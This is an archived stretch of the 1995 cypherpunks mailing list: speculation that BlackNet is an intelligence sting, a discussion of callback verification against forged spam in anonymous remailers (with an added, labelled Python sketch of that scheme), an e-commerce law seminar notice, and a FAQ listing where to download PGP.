> What do you say we put the word out?

Mixed feelings.  On the one hand, I am starting to believe in this theory
more and more.  On the other hand, I think that having a BlackNet run by
security agencies is actually a stabilizing thing to some degree:  those
who are foolish enough to deal with unknown parties with unknown interests
in arbitrary secrets with petty motives will generally become neutralized.
For instance, those who sell 2000 credit card numbers or 500 broken Digital
Cash Card readouts (is this possible) can be paid or prosecuted at leisure.

In either case, such folks will find more and more security holes plugged
as they clearly identify where they are for the security agencies... this
would prevent a general crackdown on cryptography etc., effectively the
security agencies would have learned to work 'within the new realities'.

I suspect targets might be less likely to be chosen by police discretion,
and more likely to be chosen for their threat value, if they required less
(discretionary) effort to investigate in the first place.  Note that some
laws, like small scale marijuana growing, often go unenforced unless there
is a specific complaint or hard evidence is directly presented to police.
In the 'BlackNet sting', such a flow of evidence would be constantly on its
way in to the police, probably forcing them into more of a reactive mode,
and definitely focusing their attention on those actively peddling secrets
as opposed to those just trying to keep them.  Not too bad for privacy.

Furthermore, the flow of truly scary secrets flowing their way might make
them ration their effort to plug leaks of high priority:  nuclear weapon
design, biological warfare blueprints, formulae for putting necrotizing
fasciitis into the common cold protein coat, 'gray goo' nanotechnology...
and other things that constitute serious threats to life on this planet.
This might probably divert effort away from prosecuting 'victimless crime',
enhancing civil liberties. For once such agencies might be 'doing their job'.
If indeed they have any legitimate job, which is always up for debate.

Of course they will also engage in petty prosecution of those who they
perceive are acting against their narrow interests, but all organisms
act to preserve and advance themselves... this comes and goes with their
leaders (J. Edgar Hoover, William Casey come to mind as good/bad examples)
who hopefully turn over with the tide of politics, minimizing the abuses
in the long run.  Of course this is little consolation to those they target.
Systematic abuses might be more easily revealed by 'whistleblowers' if there
were a clear record kept 'inside' of which leads were followed and which not.

Blow the whistle?  Sure, we could.  But what difference does it make?  If
no one trusts BlackNets, then the security agencies just take a different
route to building up credibility for a 'sting', using more private means,
or many such more private means, and again we increase their discretionary
powers as they decide where to devote effort to building up a reputation
(hmm do we target Colombian druglords?  biohackers?  breakaway republics?
cryptographers?) and thereby where to concentrate enforcement.  Perhaps by
blowing a whistle on a 'BlackNet sting' we simply force them to evolve to
more devious methods, that require more planning, and cost more (thus maybe
reducing their overall activity - although history says otherwise) but in
the long run is even more directed by the interest/prejudice of leaders.  It
may be that the simpler and more reactive the methods they apply, the better.
It is largely premeditated human scheming that starts wars, isn't it?  Not
simple knee jerks.  Perhaps others believe otherwise, but not really an issue
for debate in cypherpunks.

Perhaps it is better to co-opt agencies by giving them a reason to adopt
the cryptographer's agenda.  It's got to be cheaper and easier for them
to sit and buy secrets than it is to go out and dig them up themselves...
and cryptography generally advances that capability as folks feel safe
using it to transmit secrets electronically.  

Of course the idea that black nets must be a sting is speculation, but
it would hardly be the first time that security agencies and those that
they officially target had developed a symbiotic relationship.  Here in
Canada it was recently revealed that CSIS (the 'Canadian CIA') had been
actively involved in the founding of the Heritage Front, a neo-Nazi group.
In fact one of their leaders was an agent!  Interestingly, this appears 
to be a more effective/cheaper way to control a large group of otherwise
dangerous people - if they want to follow a leader, let them!  Just make
sure the leader is someone you control and you can prevent things from
getting too far out of hand.  Which is the only time that CSIS or the CIA
should be stepping in anyway.  It is sort of a pre-emptive strike and not
at all 'politically correct' in a liberal democracy, but they do it anyway.

That's life.  And maybe it's easier to keep an eye on simple forms of life.

Craig Hubley                Business that runs on knowledge
Craig Hubley & Associates   needs software that runs on the Web
craig@passport.ca   416-778-6136  416-778-1965 FAX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Thu, 19 Jan 95 02:30:36 PST
To: cypherpunks@toad.com
Subject: Re: Anti-Spam Methods
Message-ID: <199501191035.FAA07879@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Nathan Zook writes:
> Ivan Boskey?  (sp)

"Boesky"

[...]
>      We are capable of controlling mail bombs, for instance, in the
> following way:
>  
>      Take an incoming message, capture From: line.  Strip header.  MD5 body.
> Add to sorted table [From: MD5(message) date].  Check for repetition of
> first two fields.  If reps = 1, forward message.  If reps = 2, send message
> to From:  "Possible error.  Two copies of message <message> received."  

We were just discussing this on the remailer operators' list. Homer was
mulling over sending an automatic acknowledgement of each article submitted
for anon posting. I pointed out that From: lines (and even From lines) are 
notoriously unreliable. For example, in the Scythe spam, the articles were
ostensibly from various people @crl.com. Autoacks might have raised the ire
of plenty of people, but wouldn't have reached the real perpetrator.

> If reps = 0 mod 5, send letter to postmaster@From:.  "Possible mailbomb or
> spam.  <reps> copies of <message> received from <From:> at your site in the
> past week." Clear table of entries more than a week old every midnight.

This would necessitate keeping full logs of all traffic passing through the
remailer for up to a week. Speaking only for myself, I can't imagine adopting
such a remailer policy. YMMV.

>      If all remailers did this, then no matter where the net was entered,
> the messages would be rejected.  And spammers/bombers would be spamming/
> bombing their own postmaster.  

Again, in a forged-spam case like Scythe, the spammers/bombers would be
inducing the remailers to spam/bomb some arbitrary postmasters -- perhaps even
the remailers' postmasters -- as a side effect.

A "call-back" scheme might, however, be used to verify an originator's 
address. In this scheme, when a remailer receives a message for remailing, it
generates a few lines of random garbage and associates them with the message.
These lines are sent, along with a hash of the original message, in a brief 
ack message to the address in the From: line of the message. The headers of 
the message are discarded. When the remailer receives a message with a 
Callback: header, it checks the reply against the table associated with the 
current message pool. If a match is found, the associated message is marked 
ready for remailing. After a fairly short period, a message which still hasn't
been marked for remailing is deleted.

With chaining, more record-keeping by the remailers would be needed. The
remailers can't automatically honor all callbacks from other remailers, 
because wise forgers would simply forge their mail so it appeared to originate
from some known remailer address. So each remailer would need to keep (for a
brief period) a hash of each message it remails, in order to decide which
callback queries to answer. A list of current remailers could be used to
winnow out messages which are not being remailed to other remailers, and hence
need not be hashed and kept.

This protocol would aid a remailer operator who decided to trace a spam in
progress, because it should prevent spammers from forging their messages.

Couple this with mandatory appending of encrypted reply blocks, and the
release valve of two-way communication might be opened. Legal proceedings
obviously can't be brought successfully against anonymous parties, so 
achieving common carrier status is about the only antidote to that problem
I can foresee at the moment.

I'm thinking about working on code to implement some of this stuff in existing
remailer software, so I'm especially interested in hearing objections, flames,
suggestions, encouragement, etc. about it. I've spent a while contemplating
the wants and needs of prospective benign remailer users -- market research,
if you will. At this point, I think patching together various pieces of
existing remailer technology might greatly improve the attractiveness of the
c'punks style remailers.

 -L. Futplex McCarthy; PGP key by finger or server   "The objective is for us 
  to get those conversations whether they're by an alligator clip or ones and 
  zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. Freeh

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLx4/Tmf7YYibNzjpAQGcHgP+Nmo+c/Cfdul7HsZGOXR+cP+rmAVP1tRB
6PZcm/PDycd9HBTYqhraPsmwn7OGbqnWTeF0O5AitGSnwdG5o8+sSdUJ+KfJ1AcQ
tcyBFlvk9Rh/UIuzksUOeY935CVMA0nEmiXLoyJnnpiRoThctd/yILd8V+qiQ1pK
46j6Y7WeK5E=
=vUEc
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLx5AZCoZzwIn1bdtAQE70wF/dta1dAuc7yWpkqkK2asa+9V/H3zN/cPI
vGyOSZMIvRCcAGLgSCUwZes+e3l7ETnZ
=2HOy
-----END PGP SIGNATURE-----
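
The call-back scheme described in the message above, including the per-remailer hash table needed for chaining, as an added sketch that is not part of the original post or of any remailer's code. The class and method names, the TTL values, the example.invalid addresses and the use of SHA-256 in place of the MD5 named in the quoted scheme are all assumptions.

```python
import hashlib
import secrets

PENDING_TTL = 600  # seconds a submission waits for its callback (assumed value)
SENT_TTL = 600     # seconds a forwarded-message hash is remembered (assumed value)


def body_hash(body: bytes) -> str:
    # SHA-256 is substituted here for the MD5 named in the quoted scheme.
    return hashlib.sha256(body).hexdigest()


class Remailer:
    """Hypothetical remailer that keeps only short-lived callback state."""

    def __init__(self, address, known_remailers):
        self.address = address
        self.known_remailers = set(known_remailers)
        self.pending = {}  # token -> (body, deadline): awaiting a callback
        self.sent = {}     # body hash -> deadline: forwarded to another remailer
        self.ready = []    # bodies cleared for remailing

    def expire(self, now):
        # Unconfirmed submissions and old forwarding records are dropped.
        self.pending = {t: e for t, e in self.pending.items() if e[1] > now}
        self.sent = {h: d for h, d in self.sent.items() if d > now}

    def receive(self, from_addr, body, now):
        """Hold a submission and return the ack to send to the claimed sender."""
        token = secrets.token_hex(16)  # the "few lines of random garbage"
        self.pending[token] = (body, now + PENDING_TTL)
        # Headers are discarded: only the body and the claimed address are used.
        return {"to": from_addr, "from": self.address,
                "token": token, "hash": body_hash(body)}

    def handle_callback(self, token, now):
        """Process a Callback: reply; True if it released a held message."""
        self.expire(now)
        entry = self.pending.pop(token, None)
        if entry is None:
            return False
        self.ready.append(entry[0])
        return True

    def forward(self, body, next_hop, now):
        """Remail a body; record its hash only when the next hop is a remailer."""
        if next_hop in self.known_remailers:
            self.sent[body_hash(body)] = now + SENT_TTL

    def answer_query(self, ack, now):
        """Answer another remailer's ack only for a message this one really sent."""
        self.expire(now)
        if ack["hash"] in self.sent:
            return ack["token"]  # becomes the Callback: reply
        return None              # never sent by us: the origin was forged


def demo():
    """Constructed scenario: one genuine chained message, one forged origin."""
    a = Remailer("remailer-a@example.invalid", ["remailer-b@example.invalid"])
    b = Remailer("remailer-b@example.invalid", ["remailer-a@example.invalid"])

    # A real user submits to A, receives the ack and returns the token.
    ack = a.receive("alice@example.invalid", b"hello", now=0)
    released_user = a.handle_callback(ack["token"], now=5)

    # A chains the message to B; B calls back to A, which recognises the hash.
    body = a.ready.pop()
    a.forward(body, b.address, now=6)
    ack_b = b.receive(a.address, body, now=6)
    reply = a.answer_query(ack_b, now=7)
    released_chain = reply is not None and b.handle_callback(reply, now=8)

    # A submission falsely claiming to come from A: A has no record of the
    # hash, so it sends no callback and B deletes the message at the deadline.
    ack_f = b.receive(a.address, b"spam", now=9)
    forged_reply = a.answer_query(ack_f, now=10)
    b.expire(now=9 + PENDING_TTL)

    return released_user, released_chain, forged_reply, len(b.pending), b.ready


if __name__ == "__main__":
    print(demo())
```

The only state held is a token per pending message and a hash per forwarded message, each for a short TTL, which is the contrast the post draws with keeping a week of traffic logs.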




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 19 Jan 95 03:25:14 PST
To: cypherpunks@toad.com
Subject: Law of Electronic Commerce -- seminar announcement
Message-ID: <v01510105ab4341969eb0@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


FWIW,
Bob Hettinga

>From: nsb@radiomail.net
>Date: Wed, 18 Jan 1995 14:16:54 -0800
>To: inet-marketing@einet.net, www-buyinfo@allegra.att.com,
>        edi-new@tegsun.harvard.edu, ietf-edi@byu.edu
>Original-From: "NSB's Portable (via RadioMail)" <nsb@radiomail.net>
>Subject: Law of Electronic Commerce -- seminar announcement
>Reply-To: Nathaniel Borenstein <nsb@nsb.fv.com> (via RadioMail)
>
>To help educate business professionals about electronic commerce,
>First Virtual (TM) Holdings Incorporated is pleased to lend promotional
>support to:
>
>                   Law of Electronic Commerce
>                         On-line Seminar
>         Starting January 30, March 13, and May 9, 1995
>                  Future Dates to Be Announced
>
>The National Computer Security Association announces a new form of
>professional education -- an on-line seminar.  It is education
>delivered through the NCSA InfoSecurity Forum on CompuServe.
>(Internet delivery is also available.)  For 30 days, attorney
>Benjamin Wright will convene a seminar covering The Law of
>Electronic Commerce -- EDI and E-mail Contracts and Records.
>
>Participants will attend the seminar by exchanging computer
>messages with Wright in a private discussion forum.  Thus, no one
>will have to travel or miss time away from the office or home.
>
>The seminar is designed for security managers, Online and MIS
>professionals, EDI managers, purchasing managers who use EDI and E-
>mail, lawyers, accountants and auditors.  Topics on the agenda:
>
>1.  Electronic Contracts
>2.  Electronic Data Interchange (EDI) and Electronic Funds Transfer
>3.  Electronic Signatures
>4.  EDI Trading Partner Agreements
>5.  Value-Added Network Agreements
>6.  Electronic & Optical Evidence
>7.  EDI & Optical Tax Records
>8.  UCC Article 4A
>9.  Electronic Healthcare Data
>10. E-mail Privacy
>
>Tuition is $350 for NCSA members and $395 for non-members.  (Group
>discounts are available.)
>
>The starting dates for the next three sessions of the seminar are
>January 30, March 13, and May 9, 1995.
>
>Special Guest Lecturers:
>
>     Nathaniel Borenstein, Chief Scientist,
>          First Virtual Holdings Incorporated
>
>     Richard K. Crone of KPMG Peat Marwick LLP,
>          electronic banking expert
>
>Views expressed in the seminar are those of the individuals expressing
>them and not necessarily those of sponsors, employers or anyone else.
>
>To register on-line, or for more information and a free brochure, point
>your browser at the following URL:
>
>http://www.infohaus.com/sponsored/ncsa-seminar.html
>
>Or write to:
>
>National Computer Security Association
>10 South Courthouse Ave.
>Carlisle, PA  17013
>Tel: (800) 488-4595
>Tel: (717) 258-1816
>Fax: (717) 243-8642
>bwrigh01@reach.com
>
>             (This Notice May Be Distributed Freely)

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Cooper <entropy@IntNet.net>
Date: Thu, 19 Jan 95 03:41:25 PST
To: Richard Parratt <rparratt@london.micrognosis.com>
Subject: Re: Internet, spamming, etc.
In-Reply-To: <9501191012.AA04837@pero>
Message-ID: <Pine.SV4.3.91.950119062732.2080B-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


> One could theoretically have a package that sprayed UDP packets
> at a particular IP address, or even have a modified TCP
> that ignored disconnects. I think most service providers
> would regard using such code as being on a par with running
> a program that tried to telnet sequentially to all known IP
> addresses, trying common passwords on each.

  Code exists to do all of the things that you've mentioned.

  That was the original point of the discussion.

-jon

( --------[ Jonathan D. Cooper ]--------[ entropy@intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4  5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Paul Johnson <mpj@netcom.com>
Date: Thu, 19 Jan 95 07:18:01 PST
To: dubois@csn.org
Subject: Where to Get PGP FAQ
Message-ID: <Pine.3.89.9501190724.A20182-0100000@netcom2>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

===============================BEGIN SIGNED TEXT=============================

WHERE TO GET THE PRETTY GOOD PRIVACY PROGRAM (PGP)
(Last modified: 17 January 1995 by Mike Johnson)

WHAT IS THE LATEST VERSION?

 |-----------------+---------------------+---------------------------------|
 | Platform(s)     | Latest Version      | Distribution File Names         |
 |-----------------+---------------------+---------------------------------|
 | DOS, Unix,      | Viacrypt PGP 2.7    | disk sets                       |
 | Mac, Windows,   |                     |                                 |
 | or WinCIM/CSNav |                     |                                 |
 |-----------------+---------------------+---------------------------------|
 | DOS, Unix,      | MIT PGP 2.6.2       | pgp262.zip  (DOS + docs)        |
 | others          |                     | pgp262s.zip (source)            |
 |                 |                     | pg262s.zip source on CompuServe |
 |                 |                     | pgp262.tar.gz (source)          |
 |                 |                     | pgp262.gz (same as above on DOS)|
 |                 |                     | pgp262.tar.Z (source)           |
 |                 |                     | pgp262dc.zip (documentation)    |
 |                 |                     | pg262d.zip (docs on CompuServe) |
 |-----------------+---------------------+---------------------------------|
 | Macintosh       | MIT PGP 2.6         | MacPGP2.6.sea.hqx (binary+docs) |
 |                 |                     | macpgp26.hqx (same as above)    |
 |                 |                     | MacPGP2.6.src.sea.hqx (source)  |
 |                 |                     | macpgp26.src (same as above)    |
 |                 |                     | MacPGP2.6-68000.sea.hqx (binary)|
 |                 |                     | mcpgp268.hqx (same as above)    |
 |-----------------+---------------------+---------------------------------|
 | Mac Applescript | MacPGP 2.6ui v 1.2  | MacPGP-2.6ui-v1.2.sit.hqx       |
 |                 | + some beta versions| MacPGP2.6ui_V1.2_sources.cpt.hqx|
 |                 | based on MIT PGP    | MacPGP2.6uiV1.2en.cpt.hqx       |
 |                 | 2.6.2               | MacPGP2.6uiV1.2src.cpt.hqx      |
 |                 |                     | MacPGP2.6uiV1.2.68000.hqx       |
 |                 |                     | MacPGP2.6.2.beta*.sea.hqx       |
 |                 |                     | MacPGP2.6.2.beta*.src.sea.hqx   |
 |-----------------+---------------------+---------------------------------|
 | Amiga           | PGP 2.6.2 Amiga 1.4 | pgp262-a14-000.lha              |
 |                 |                     | pgp262-a14-020.lha              |
 |                 |                     | pgp262-a14-src.lha              |
 |-----------------+---------------------+---------------------------------|
 | Atari           | Atari PGP 2.6.1     | pgp261st.zip                    |
 |                 |                     | pgp261b.lzh                     |
 |-----------------+---------------------+---------------------------------|
 | Non-USA version | PGP 2.6.i from      | pgp26i.zip                      |
 | to avoid RSAREF | Stale Schumacher    | pgp26is.zip                     |
 | license.        |                     | pgp26is.tar.gz                  |
 |_________________|_____________________|_________________________________|


PGP BOOKS

Protect Your Privacy:         PGP: Pretty Good Privacy
  A Guide for PGP Users
by William Stallings          by Simson Garfinkel
Prentice Hall PTR             O'Reilly & Associates, Inc.
ISBN 0-13-185596-4            ISBN 1-56592-098-8
US $19.95                     US $24.95

If you order Stallings' book from National Computer Security Association
(74774.1326@compuserve.com) they will donate $1 of the price to Phil
Zimmermann's legal defense fund.


WHERE CAN I GET THE PGP VERSION DIRECTLY FROM PHILIP ZIMMERMANN?

Get the MIT version.  See  http://web.mit.edu/network/pgp-form.html


WHAT IS PGP 2.6.i?

Stale Schumacher <staalesc@ifi.uio.no> released an international version of
PGP built the "right way."  By "right way," I mean that it uses the latest
MIT code, but uses a different rsaglue.c to use the mpilib instead of RSAREF
for RSA calculations, thus including all the latest bug fixes and features in
the main freeware PGP code line, but frees non-USA persons from the
limitations of the RSAREF license.  This release has been as strongly
endorsed by Philip Zimmermann as he can do without incriminating himself.

Naturally, by not using the RSAREF code for RSA calculations, this version is
not legal for use in the USA (other than limited research, etc.), but is fine
anywhere else (like Canada) where RSA patents don't hold.

Note that the latest version of Stale Schumacher's PGP is 2.6.i; 2.6i
(without the second .) was a beta test version that has been superseded.


WHAT IS PGP 2.6ui?

The "unofficial international" versions are really just PGP 2.3a, modified
just enough to make it compatible with MIT PGP 2.6, but do not include all of
the fixes in MIT PGP 2.6 and MIT PGP 2.6.1.  They have a "ui" somewhere in
their file names.


WHERE CAN I GET VIACRYPT PGP?

Contact Viacrypt in Phoenix, Arizona, USA.  The commercial version of PGP is
fully licensed to use the patented RSA and IDEA encryption algorithms in
commercial and government environments in the USA and Canada.  It is fully
compatible with, functionally the same as, and just as strong as the freeware
version of PGP. Due to limitations on ViaCrypt's RSA distribution license,
ViaCrypt only distributes executable code and documentation for it, but they
are working on making PGP available for a variety of platforms.  Call or
write to them for the latest information.  The latest version number for
Viacrypt PGP is 2.7.

Here is a brief summary of Viacrypt's currently-available products:

1. ViaCrypt PGP for MS-DOS.  Prices start at $99.98

2. ViaCrypt PGP for UNIX.  Includes executables for the following
   platforms:

     SunOS 4.1.x (SPARC)
     IBM RS/6000 AIX
     HP 9000 Series 700/800 UX
     SCO 386/486 UNIX
     SGI IRIX
     AViiON DG-UX(88/OPEN)

   Prices start at $149.98

     Executables for the following additional platforms are
     available upon request for an additional $30.00 charge.

     BSD 386
     Ultrix MIPS DECstation 4.x


3. ViaCrypt PGP for WinCIM/CSNav.  A special package for users of
   CompuServe.  Prices start at $119.98

Please contact ViaCrypt for quantity discount pricing.

Orders may be placed by calling 800-536-2664 during the hours of 8:30am to
5:00pm MST, Monday - Friday.  They accept VISA, MasterCard, AMEX and Discover
credit cards.

If you have further questions, please feel free to contact:

Paul E. Uhlhorn
Director of Marketing, ViaCrypt Products
Mail:          9033 N. 24th Avenue
               Suite 7
               Phoenix AZ 85021-2847
Phone:         (602) 944-0773
Fax:           (602) 943-2601
Internet:      viacrypt@acm.org
Compuserve:    70304.41


WHERE CAN I GET THE FREEWARE PGP?

These listings are subject to change without notice.  If you find that PGP has
been removed from any of these sites, please let me know so that I can update
this list.  Likewise, if you find PGP on a good site elsewhere (especially on
any BBS that allows first time callers to access PGP for free), please let me
know so that I can update this list.  Because this list changes frequently, I
have not attempted to keep it complete, but there should be enough pointers
to let you easily find PGP.

There are several ways to get the freeware PGP:  ftp, WWW, BBS, CompuServe,
email ftp server, and sneakernet (ask a friend for a copy).  Just don't ask
Philip Zimmermann directly for a copy.


FTP SITES IN NORTH AMERICA

There are some weird hoops to jump through, thanks to the U. S. Department of
State, at many of these sites.  This is apparently because the U. S.
Department of State wants to make it easier for people outside of North
America to develop, distribute, use, or sell strong cryptographic software
than people inside of the USA and Canada -- at least that is the effect of
their rules.

Telnet to net-dist.mit.edu, log in as getpgp, answer the questions, then ftp
to net-dist.mit.edu and change to the hidden directory named in the telnet
session to get your own copy.

MIT-PGP is for U. S. and Canadian use only, but MIT is only distributing it
within the USA (due to some archaic export control laws).

You can also get PGP from:

ftp.csn.net/mpj
    See ftp://ftp.csn.net/mpj/README.MPJ

ftp.netcom.com/pub/mp/mpj
    See ftp://ftp.netcom.com/pub/mp/mpj/README.MPJ

ftp.netcom.com/pub/gr/grady/PGP (U. S. and Canada only).

ftp.eff.org
    Follow the instructions found in README.Dist that you get from one of:
    ftp://ftp.eff.org/pub/Net_info/Tools/Crypto/README.Dist
    gopher.eff.org, 1/Net_info/Tools/Crypto
    gopher://gopher.eff.org/11/Net_info/Tools/Crypto
    http://www.eff.org/pub/Net_info/Tools/Crypto/

ftp.csua.berkeley.edu (for U. S. or Canadian users)
    /pub/cypherpunks/pgp/

ftp.gibbon.com
    /pub/pgp/README.PGP (OS/2 users see also /pub/gcp/gcppgp10.zip)

ftp.wimsey.bc.ca
    /pub/crypto/software/dist/README


WORLD WIDE WEB ACCESS

    http://web.mit.edu/network/pgp-form.html
    http://www.ifi.uio.no/~staalesc/PGPVersions.html
    http://www.mantis.co.uk/pgp/pgp.html
    http://rschp2.anu.edu.au:8080/crypt.html
    http://www.eff.org/pub/Net_info/Tools/Crypto/
    http://community.net/community/all/home/solano/sbaldwin
    http://www.cco.caltech.edu/~rknop/amiga_pgp26.html

COMPUSERVE

GO NCSAFORUM.  Follow the instructions there to gain access to Library 12: Export
Controlled.  PGP may be other places, too.

Compuserve file names are even more limited than DOS (6.3 instead of the
already lame 8.3), so the file names to look for are PGP262.ZIP, PG262S.ZIP
(source code), PGP262.GZ (Unix source code) and PG262D.ZIP (documentation
only).


BULLETIN BOARD SYSTEMS

Colorado Catacombs BBS
    Mike Johnson, sysop
    Mac and DOS versions of PGP, PGP shells, and some other crypto stuff.
    Also the home of some good Bible search files and some shareware written
    by Mike Johnson, including ATBASH, DLOCK, CRYPTA, CRYPTE, CRYPTMPJ, MCP,
    MDIR, DELETE, PROVERB, SPLIT, ONEPAD, QUICRYPT, etc.
    v.FAST/v.32bis/v.42bis, speeds up to 28,800 bps
    8 data bits, 1 stop, no parity, as fast as your modem will go.
    Use ANSI terminal emulation, or if you can't, try VT-100.
    Free access to PGP.  If busy or no answer, try again later.
    For free access: log in with your own name, answer the questions, then
    select [Q]uestionaire 3 from the [M]ain menu.
    (303) 772-1062  Longmont, Colorado number - 2 lines.
    (303) 938-9654  Boulder, Colorado number forwarded to Longmont number
                    intended for use by people in the Denver, Colorado area.

The Freedom Files BBS, DeLand Florida, USA  904-738-2691

Exec-Net, New York, NY, USA  (Host BBS for the ILink net)  914-667-4567

The Ferret BBS (North Little Rock, Arkansas)
    (501) 791-0124   also   (501) 791-0125
    Special PGP users account:
    login name: PGP USER
    password:   PGP

CVRC BBS  317-791-9617

CyberGold BBS 601-582-5748

Self-Governor Information Resource, 915-587-7888, El Paso, Texas, USA

In the UK, try 01273-688888

MAUS BBS (+49 781 38807) Offenburg, Germany - connected to the MausNet


OTHER FTP SITES

    ftp.informatik.uni-hamburg.de
      /pub/virus/crypt/pgp
      This site has most, if not all, of the current PGP files.

    ftp.leo.org
      /pub/com/os/os2/crypt

    ftp.ox.ac.uk  (163.1.2.4)
      /pub/crypto/pgp
      This is a well organized site with most of the current PGP files as
      well as shells and mailer scripts.

    ftp.netcom.com
      /pub/dc/dcosenza -- Some crypto stuff, sometimes includes PGP.

    unix.hensa.ac.uk
      /pub/uunet/pub/security/virus/crypt/pgp

    ftp.ee.und.ac.za
      /pub/crypto/pgp

    ftp.csua.berkeley.edu
      /pub/cypherpunks/pgp (DOS, MAC)

    ftp.demon.co.uk
      /pub/amiga/pgp
      /pub/archimedes
      /pub/pgp
      /pub/mac/MacPGP

    ftp.informatik.tu-muenchen.de

    ftp.funet.fi

    ftp.dsi.unimi.it
      /pub/security/crypt/PGP

    atari.archive.umich.edu
      /pub/atari/Utilities/pgp261st.zip (Atari)

    ftp.tu-clausthal.de (139.174.2.10) (Atari ST/E,TT,Falcon)
      /pub/atari/misc/pgp/pgp261b.lzh

    wuarchive.wustl.edu
      /pub/aminet/util/crypt

    src.doc.ic.ac.uk (Amiga)
      /aminet
      /amiga-boing

    ftp.informatik.tu-muenchen.de
      /pub/comp/os/os2/crypt/pgp23os2A.zip (OS/2)

    iswuarchive.wustl.edu
      pub/aminet/util/crypt (Amiga)

    nic.funet.fi  (128.214.6.100)
      /pub/crypt

    ftp.uni-kl.de (131.246.9.95)
      /pub/aminet/util/crypt

    qiclab.scn.rain.com (147.28.0.97)

    pc.usl.edu (130.70.40.3)

    leif.thep.lu.se (130.235.92.55)

    goya.dit.upm.es (138.4.2.2)

    tupac-amaru.informatik.rwth-aachen.de (137.226.112.31)

    ftp.etsu.edu (192.43.199.20)

    pencil.cs.missouri.edu (128.206.100.207)

    ftp.csua.berkeley.edu

    kauri.vuw.ac.nz

    nctuccca.edu.tw
      /PC/wuarchive/pgp/

    ftp.fu-berlin.de:/mac/sys/init/MacPGP2.6uiV1.2en.cpt.hqx.gz

Also, try an archie search for PGP.


FTPMAIL

For those individuals who do not have access to FTP, but do have access
to e-mail, you can get FTP files mailed to you.  For information on
this service, send a message saying "help" to ftpmail@decwrl.dec.com.

Another e-mail service is from nic.funet.fi. Send mail to mailserv@nic.funet.fi
with the word HELP.

For the ftp sites on netcom, send mail to ftp-request@netcom.com containing
the word HELP in the body of the message.

To get pgp 2.6.i by email:
  Send a message to hypnotech-request@ifi.uio.no with your request in the
  Subject: field.

  Subject             What you will get

  GET pgp26i.zip      MS-DOS executable (uuencoded)
  GET pgp26is.zip     MS-DOS source code (uuencoded)
  GET pgp26is.tar.gz  UNIX source code (uuencoded)

For FAQ information, send e-mail to mail-server@rtfm.mit.edu with
      send usenet/news.answers/ftp-list/faq
in the body of the message.


MACPGP OPTIONS

There are multiple parallel efforts to write an up-to-date MacPGP.  See the
following for the latest MacPGP beta stuff. Zbigniew Fiedorowicz
<fiedorow@math.ohio-state.edu> has updated his MacPGP to support Apple
events, and his distribution comes with complete source code. Grady's netcom
directory contains a different version, about which he says "This latest bug
release beta 1.23 fixes several relatively minor bugs.  Source to this
version is NOT available, so its use should be restricted to experimentation
only."

ftp://ftp.csn.net/mpj/README.MPJ
ftp://ataxia.res.wpi.edu/pub/mac-pgp/README
ftp://highway.alinc.com/users/jordyn/mac-pgp/README
ftp://ftp.netcom.com/pub/gr/grady/PGP/MacPGP262b1.23.seq.hqx.asc


PGP FOR WINDOWS, WINDOWS NT, AND WINDOWS 95

There isn't one, yet, that I know of (at least not a true native Windows
application).  There are several good shells that call the DOS PGP for the
actual work, though.  I use Viacrypt's, but there are others available as
shareware or freeware at most of the sites listed above for PGP itself.


IS MY COPY OF PGP GOOD?

If you find a version of the PGP package that does not include the PGP User's
Guide, something is wrong.  The manual should always be included in the
package.  PGP should be signed by one of the developers (Philip Zimmermann,
Jeff Schiller, Viacrypt, Stale Schumacher, etc.).


OTHER PGP DOCUMENTATION

   For more information on the "time bomb" in PGP, see
   ftp://ftp.csn.net/mpj/pgpbomb.asc

   More PGP details are at
   http://www.pegasus.esprit.ec.org/people/arne/pgp.html

   Windows shells documentation
   http://www.LCS.com/winpgp.html

   Watch for the full PGP FAQ on alt.security.pgp.

LANGUAGE MODULES

   These are suitable for most PGP versions.  I am not aware of any
   export/import restrictions on these files.

    German
     * _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_german.txt
     * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp_german.txt
     * _US:_ ftp://ftp.csn.net/mpj/public/pgp/PGP_german_docs.lha

    Italian
     * _IT:_
     ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP/pgp-lang.italian.tar.gz
     * _FI:_
     ftp://ftp.funet.fi/pub/crypt/ghost.dsi.unimi.it/PGP/pgp-lang.italian.tar.gz
     * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp-lang.italian.tar.gz

    Japanese
     * _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_japanese.tar.gz
     * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp-msgs-japanese.tar.gz

    Lithuanian
     * _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_lithuanian.zip
     * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp23ltk.zip

    Russian
     * _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp26_russian.zip
